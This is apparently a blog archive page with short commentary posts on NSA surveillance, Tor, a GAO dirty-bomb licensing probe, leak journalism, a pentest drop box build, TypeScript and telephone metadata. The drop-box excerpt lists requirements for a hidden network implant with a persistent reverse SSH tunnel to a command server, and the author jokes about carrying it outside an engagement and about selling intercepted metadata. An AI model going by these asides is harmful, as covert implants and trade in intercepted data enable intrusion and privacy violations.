  • We will combat terrorism around the globe – when necessary, putting our lives on the line to preserve the Nation.
  • We will provide our policymakers, negotiators, ambassadors, law enforcement community, and military the vital intelligence they need to protect and defend the Nation.
  • We will defend the national security networks vital to our Nation.
  • We will be a trusted steward of public resources and place prudent judgment over expediency.
  • We will continually strive for transparency in all our review, monitoring, and decision-making processes.
  • We will be accountable for our actions and take responsibility for our decisions.
  • We will honor Open Government and Transparency mandates by making timely and accurate information available to the public, subject to valid privacy, confidentiality, security or other restrictions under existing law and policies.
  • Along with those exciting programs we partner with the Maryland STEM program.

What I find even more disturbing than the current threat statement is that it was written after mass collection of telephone data (under the Committment) was found to be useless:

A member of the White House review panel on NSA surveillance said he was “absolutely” surprised when he discovered the agency’s lack of evidence that the bulk collection of telephone call records had thwarted any terrorist attacks.

“It was, ‘Huh, hello? What are we doing here?’” said Geoffrey Stone, a University of Chicago law professor, in an interview with NBC News. “The results were very thin.”

While Stone said the mass collection of telephone call records was a “logical program” from the NSA’s perspective, one question the White House panel was seeking to answer was whether it had actually stopped “any [terror attacks] that might have been really big.”

“We found none,” said Stone.

Under the NSA program, first revealed by ex-contractor Edward Snowden, the agency collects in bulk the records of the time and duration of phone calls made by persons inside the United States.

Stone was one of five members of the White House review panel – and the only one without any intelligence community experience – that this week produced a sweeping report recommending that the NSA’s collection of phone call records be terminated to protect Americans’ privacy rights. (NSA program stopped no terror attacks, says White House panel member by Michael Isikoff.)

Shouldn’t the three hundred plus page report: Liberty and Security in a Changing World, dated 12 December 2013, result in a less paranoid, less extreme view of threats?

Pursuit of a paranoid and largely delusional view of the world, even post-exposure as paranoid and delusional, does not bode well for those subject to NSA surveillance.

Encrypt, Onionize and Erase (EOE) is your new mantra.

Tor Browser User Manual (updated)

Filed under: Cybersecurity,Security,Tor — Patrick Durusau @ 1:15 pm

Tor Browser User Manual 6.0.1.

From About Tor Browser:

Tor Browser uses the Tor network to protect your privacy and anonymity. Using the Tor network has two main properties:

  • Your internet activity, including the names and addresses of the websites you visit, will be hidden from your Internet service provider and from anyone watching your connection locally.
  • The operators of the websites and services that you use, and anyone watching them, will see a connection coming from the Tor network instead of your real Internet (IP) address, and will not know who you are unless you explicitly identify yourself.

In addition, Tor Browser is designed to prevent websites from “fingerprinting” or identifying you based on your browser configuration.

By default, Tor Browser does not keep any browsing history. Cookies are only valid for a single session (until Tor Browser is exited or a New Identity is requested).

With intelligence agencies promising to obey laws in future, the saying:

Fool me once,

Shame on you;

Fool me twice,

Shame on me.

comes to mind.

Surf without Tor if you believe liars and law breakers won’t continue to be liars and law breakers, but for the rest of us the rule is:

Tor: Don’t surf the Internet Without It.

Get A Re-usable NCR License for Radioactive Material Today!

Filed under: Cybersecurity,Government,Security — Patrick Durusau @ 10:48 am

A secret group bought the ingredients for a dirty bomb — here in the U.S. by Patrick Malone.

From the post:

The clandestine group’s goal was clear: Obtain the building blocks of a radioactive “dirty bomb” — capable of poisoning a major city for a year or more — by openly purchasing the raw ingredients from authorized sellers inside the United States.

It should have been hard. The purchase of lethal radioactive materials — even modestly dangerous ones — requires a license from the Nuclear Regulatory Commission, a measure meant to keep them away from terrorists. Applicants must demonstrate they have a legitimate need and understand the NRC’s safety standards, and pass an on-site inspection of their equipment and storage.

But this secret group of fewer than 10 people — formed in April 2014 in North Dakota, Texas and Michigan — discovered that getting a license and then ordering enough materials to make a dirty bomb was strikingly simple in one of their three tries. Sellers were preparing shipments that together were enough to poison a city center when the operation was shut down.

The team’s members could have been anyone — a terrorist outfit, emissaries of a rival government, domestic extremists. In fact, they were undercover bureaucrats with the investigative arm of Congress. And they had pulled off the same stunt nine years before. Their fresh success has set off new alarms among some lawmakers and officials in Washington about risks that terrorists inside the United States could undertake a dirty bomb attack.

Fortunately, GAO investigators have shown no tendencies towards plotting overthrow of the United States government. If they had such tendencies, our government would have fallen long ago.

Malone provides an enjoyable account of the GAO romp through regulated access to radioactive materials.

Despite the language of Regulation of Radioactive Materials, the ease of obtaining radioactive materials will surprise you.

If you are interested in the security for hazardous biological materials, see: Preliminary Observations on Federal Efforts to Address Weaknesses Exposed by Recent Safety Lapses GAO-15-792T: Published: Jul 28, 2015. Publicly Released: Jul 28, 2015.

Puts our collective hand-wringing over SQL injection attacks into perspective. Yes?

Joel Simon (@Joelcpj): Woodward and Bernstein Not “Ethical and Committed” Journalists

Filed under: Government,Journalism,News,Reporting,Wikileaks — Patrick Durusau @ 10:01 am

Joel Simon‘s opinion piece How journalists can cover leaks without helping spies, leaves you with the conclusion that Woodward and Bernstein (Watergate) were not “ethical and committed” journalists.

Skipping the nationalistic ranting and “compelling evidence,” which turns out to be the New York Times parroting surmises and guesses by known liars (U.S. intelligence community), Simon writes of the Wikileaks dump of DNC emails:


As for WikiLeaks, by publishing a data dump without verifying the source or providing its readers with the context to make informed decisions about the motivations of the leakers, it is allowing itself to be a vehicle for governments like Russia that are weaponizing information and using it to achieve policy objectives. Ethical and committed journalists should do all within their power to ensure they are never put in such a position. (emphasis added)

For more than thirty years, 1972 – 2005, the Watergate source known as “Deep Throat (W. Mark Felt),” and his motives, remained a mystery to the American public.

Yet, his revelations were instrumental in bringing down an American president (Richard Nixon).

Mark Felt was a friend of Bob Woodward and their meeting in a parking garage on October 9th, 1972, lead to the October 10, 1972 Washington Post story titled: FBI Finds Nixon Aides Sabotaged Democrats.

In case you don’t remember, 1972 was a presidential election year, with the election being held on November 7, 1972.

Consider those three dates, the discussion between Bernstein and Felt (October 9, 1972), the Washington Post story (October 10, 1972) and the presidential election (November 7, 1972). Or perhaps better:


October 9, 1972 – 29 days until voting begins in presidential election

October 10, 1972 – 28 days until voting begins in presidential election

November 7, 1972 (election day)

The timing of the leak and its publication by the Washington Post less than thirty (30) days prior to a presidential election certainly make the motives of the leaker a relevant question.

Yet, Deep Throat remained unknown and “…readers with[out] the context to make informed decisions about the motivations of the [Deep Throat/Mark Felt]…” for more than thirty years.

Contrary to Joel Simon’s criteria, Woodward and Bernstein verified and corroborated the information given to them by Deep Throat/Mark Felt to be truthful and did not explore for their readers, any possible motivations on his part.

The authenticity of the DNC emails has not been challenged and resignations of Wasserman Schultz (DNC Chair), Amy Dacey (DNC CEO), Brad Marshall (DNC CFO), Luis Miranda (DNC Communications Director) and an public apology to Bernie Sanders by the Democratic National Committee, are all supporting evidence that the DNC email leak is both accurate and authentic.

Unlike Joel Simon, I think Woodward and Bernstein were “ethical and committed” journalists during Watergate, providing their readers with accurate information in a timely manner.

Without exploring the motives of why someone would leak truthful information.

The CJR, Joel Simon and the media generally should abandon its attempt to twist journalistic ethics to exclude publication of truthful information of legitimate interest to a voting public.

Judging from the tone of Simon’s post, his concerns are driven more by rabid nationalism and jingoism than any legitimate concern for journalistic ethics.

August 3, 2016

How to Build Your Own Penetration Testing Drop Box (Hardware)

Filed under: Cybersecurity,Security — Patrick Durusau @ 4:22 pm

How to Build Your Own Penetration Testing Drop Box by Beau Bullock.

With politics bleeding into even highly filtered feeds, thought it might be amusing to look at a hardware construction project.

I compared three single-board computers (SBC) against each other with a specific goal of finding which one would serve best as a “penetration testing drop box”, and maintain an overall price of around $110. Spoiler Alert: At the time I tested these Hardkernel’s ODROID-C2 absolutely destroyed the competition in this space. If you want to skip the SBC comparison and jump right to building your own pentest drop box you can find the instructions below and also here.

Overview

A few weeks ago I was scheduled for an upcoming Red Team exercise for a retail organization. In preparation for that assessment I started gathering all the gear I might need to properly infiltrate the organization, and gain access to their network. Social engineering attacks were explicitly removed from the scope for this engagement. This meant I wasn’t going to be able ask any employees to plug in USB devices, let me in certain rooms, or allow me to “check my email” on their terminals (yes this works).

Essentially, what were left at that point were physical attacks. Could I get access to a terminal left unlocked and perform a HID-based (think Rubber Ducky) attack? If the system wasn’t unlocked, perhaps a USB-Ethernet adapter (like the LAN Turtle) could be placed in line with the system to give me a remote shell to work from. Even if I could get physical access, without any prior knowledge of the network’s egress filtering setup, was I going to be able to get a shell out of the network? So this led me down the path of building a pentest drop box that I could place on a network, could command over a wireless adapter, automatically SSH out of a network, and just be an all-around pentesting box.

Some Device Requirements

Looking into the available options already out there it is very clear that I could either spend over $1,000 to buy something that did what I needed it to do, or try to build one comparable for significantly cheaper. So I set some very specific goals of what I wanted this device to do. Here they are:

  • Device has to be relatively unnoticeable in size (could be plugged in under a desk unnoticed)
  • Has to be able to be controlled over a wireless interface (bonus points if multiple wireless interfaces can be used so wireless management and wireless attacks can happen concurrently)
  • Persistent reverse SSH tunnel to a command and control server
  • Fully functional pentesting OS (not just a shell to route attacks through)
  • Decent storage space (32-64GB)
  • Actually be a usable pentesting box that is not sluggish due to hardware restrictions
  • Cost around $110 total to build

I like that, requirements!

Assuming you have a briefcase or bulky coat, not a bad piece of hardware to have on you. Unless you anticipate physical searches. Can’t ever tell when you will be curious about something.

Functional TypeScript

Filed under: Functional Programming,Programming — Patrick Durusau @ 3:29 pm

Functional TypeScript by Victor Savkin.

From the post:

When discussing functional programming we often talk about the machinery, and not the core principles. Functional programming is not about monads, monoids, or zippers, even though those are useful to know. It is primarily about writing programs by composing generic reusable functions. This article is about applying functional thinking when refactoring TypeScript code.

And to do that we will use the following three techniques:

  • Use Functions Instead of Simple Values
  • Model Data Transformations as a Pipeline
  • Extract Generic Functions

Let’s get started!

Parallel processing has been cited as a driver for functional programming for many years. It’s Time to Get Good at Functional Programming

The movement of the United States government towards being a “franchise” is another important driver for functional programming.

Code that has no-side effects can be more easily repurposed, depending on the needs of a particular buyer.

The NSA wants terabytes of telephone metadata to maintain its “data mining as useful activity” fiction, China wants telephone metadata on its financial investments, other groups are spying on themselves and/or others.

Wasteful, not to mention expensive, to maintain side-effect ridden code bases for each customer.

Prepare for universal parallel processing and governments as franchises, start thinking functionally today!

Telephone Metadata Can Reveal Surprisingly Sensitive Personal Information

Filed under: Government,Intelligence,Privacy,Telecommunications — Patrick Durusau @ 2:58 pm

Stanford computer scientists show telephone metadata can reveal surprisingly sensitive personal information by Bjorn Carey.

The intelligence community assertion that telephone metadata only enables “connecting the dots,” has been confirmed to be a lie.

From the post:

Most people might not give telephone metadata – the numbers you dial, the length of your calls – a second thought. Some government officials probably view it as similarly trivial, which is why this information can be obtained without a warrant.

But a new analysis by Stanford computer scientists shows that it is possible to identify a person’s private information – such as health details – from metadata alone. Additionally, following metadata “hops” from one person’s communications can involve thousands of other people.

The researchers set out to fill knowledge gaps within the National Security Agency’s current phone metadata program, which has drawn conflicting assertions about its privacy impacts. The law currently treats call content and metadata separately and makes it easier for government agencies to obtain metadata, in part because it assumes that it shouldn’t be possible to infer specific sensitive details about people based on metadata alone.

The findings, reported today in the Proceedings of the National Academy of Sciences, provide the first empirical data on the privacy properties of telephone metadata. Preliminary versions of the work, previously made available online, have already played a role in federal surveillance policy and have been cited in litigation filings and letters to legislators in both the United States and abroad. The final work could be used to help make more informed policy decisions about government surveillance and consumer data privacy.

The computer scientists built a smartphone application that retrieved the previous call and text message metadata – the numbers, times and lengths of communications – from more than 800 volunteers’ smartphone logs. In total, participants provided records of more than 250,000 calls and 1.2 million texts. The researchers then used a combination of inexpensive automated and manual processes to illustrate both the extent of the reach – how many people would be involved in a scan of a single person – and the level of sensitive information that can be gleaned about each user.

From a small selection of the users, the Stanford researchers were able to infer, for instance, that a person who placed several calls to a cardiologist, a local drugstore and a cardiac arrhythmia monitoring device hotline likely suffers from cardiac arrhythmia. Another study participant likely owns an AR semiautomatic rifle, based on frequent calls to a local firearms dealer that prominently advertises AR semiautomatic rifles and to the customer support hotline of a major firearm manufacturer that produces these rifles.

One of the government’s justifications for allowing law enforcement and national security agencies to access metadata without warrants is the underlying belief that it’s not sensitive information. This work shows that assumption is not true.

See Carey’s post for the laypersons explanation of the Stanford findings or dive into Evaluating the privacy properties of telephone metadata by Jonathan Mayera, Patrick Mutchler, and John C. Mitchell, for more detailed analysis. (Thankfully open access.)

Would law enforcement and national security agencies think telephone metadata is not sensitive if hackers were obtaining it from telecommunication companies and/or from the electromagnetic field where communication signals are found?

If you were interested only in law enforcement, national security agencies and governments, a much smaller set of data for tracking and processing.

Sounds like a business opportunity, depending on what country, their degree of technology, market conditions for pro/anti government data.

U.S. government satellites collect such data but it is shared (or not) for odd and obscure reasons.

I’m thinking more along the lines of commercial transactions between willing sellers and buyers.

Think of it as a Rent-An-NSA type venture. Customers don’t want or need 24×7 rivals for power. Properly organized, they could buy as much or as little intelligence as they need. Exclusive access to some intelligence would be a premium product.

OnionRunner, ElasticSearch & Maltego

Filed under: ElasticSearch,Graphs,OnionRunner,Tor,Visualization — Patrick Durusau @ 2:21 pm

OnionRunner, ElasticSearch & Maltego by Adam Maxwell.

From the post:

Last week Justin Seitz over at automatingosint.com released OnionRunner which is basically a python wrapper (because Python is awesome) for the OnionScan tool (https://github.com/s-rah/onionscan).

At the bottom of Justin’s blog post he wrote this:

For bonus points you can also push those JSON files into Elasticsearch (or modify onionrunner.py to do so on the fly) and analyze the results using Kibana!

Always being up for a challenge I’ve done just that. The onionrunner.py script outputs each scan result as a json file, you have two options for loading this into ElasticSearch. You can either load your results after you’ve run a scan or you can load them into ElasticSearch as a scan runs. Now this might sound scary but it’s not, lets tackle each option separately.

A great enhancement to Justin’s original OnionRunner!

You will need a version of Maltego to perform the visualization as described. Not a bad idea to become familiar with Maltego in general.

Data is just data, until it is analyzed.

Enjoy!

« Newer PostsOlder Posts »

Powered by WordPress